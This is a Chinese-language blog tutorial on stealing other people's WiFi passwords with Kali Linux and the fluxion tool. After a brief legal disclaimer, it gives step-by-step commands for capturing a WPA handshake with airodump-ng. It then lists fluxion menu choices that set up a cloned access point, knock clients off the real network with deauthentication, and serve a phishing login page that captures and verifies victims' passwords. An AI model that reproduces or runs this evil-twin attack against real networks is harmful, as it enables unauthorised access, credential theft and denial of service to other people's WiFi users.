本文仅供学习测试,不能用于非法用途。详见《中华人民共和国网络安全法》第二十七条 任何个人和组织不得从事非法侵入他人网络、干扰他人网络正常功能、窃取网络数据等危害网络安全的活动。

本篇主要介绍通过fluxion来实现模拟ap发射,创建钓鱼WiFi来获取别人的WiFi密码。本人用的环境是kali Linux2装在虚拟机中,但笔记本的无线网卡无法直接连到虚拟机中,所以要准备usb外接无线网卡2张,因为一张用来收一张用来发。kali只支持不多的无线网卡的芯片常见的兼容芯片有:Atheros AR9271
Ralink RT3070(我用的)
Ralink RT3572
Realtek 8187L (Wireless G adapters)
Realtek RTL8812AU
Ralink RT5370N

1. 确认USB无线网卡已经识别并启动

#iwconfig && ifconfig


2. 获取握手包

  • 1.开启无线网卡的“监听模式”
  • 2.此时原无线网卡会被重新命名为“wlan0mon”

    #ifconfig

  • 3.侦听无线信号

    #airodump-ng wlan0mon

  • 4.开始抓包

    #airodump-ng --output-format pcap -w //ssid// --bssid //ap Mac地址// -c //信道// wlan0mon

  • 5.抓包完成后会在右上角显示握手包头,这时抓包工作已经完成。
  • 附上抓包原理图

3. fluxion

  • 1、解压并进入目录
      #unzip fluxion-master.zip && cd fluxion-master
  • 2、安装fluxion,会自动下载解决依赖(所以首先要保证虚拟机能上网),如果没自动解决依赖,那就只能自己去解决了,这里不做叙述

  #./fluxion.sh

  • 3、选择语言“16”
  • 4、选择“1”,来创建一个同名的AP来欺骗用户
  • 5、选择“1”这个wlan0无线网卡来搜索AP信号
  • 6、选择“1”扫描2.4G频率的信号
  • 7、选择“17”攻击的目标AP
  • 8、选择“2”,跟踪无线和验证握手包
  • 9、选择“2”,用于干扰攻击的无线网卡
  • 10、选择“2”,wlan0进行目标AP的模拟
  • 11、选择“1”,创建一个AP热点
  • 12、输入已经获取的握手包位置
  • 13、选择“3”,选择推荐的方式去验证握手包是否有效
  • 14、选择“1”,创建web页面来让用户输入密码
  • 15、选择“1”,攻击原AP,使其连接的客户端断线
  • 16、选择“3”,web钓鱼页面的语言
  • 就会开启6个小窗口
  • 受害机连上后显示需要认证,打开网页后,一个登录页面就显示出来。
  • 在kali系统上可以看到有web页面和DNS解析等信息刷新
  • 18、此时可以在kali系统上看到用户输入的密码,并且通过握手包验证了密码是有效的

大功告成

最后修改:2019 年 04 月 08 日 08 : 44 PM
如果你觉得有用,欢迎赞赏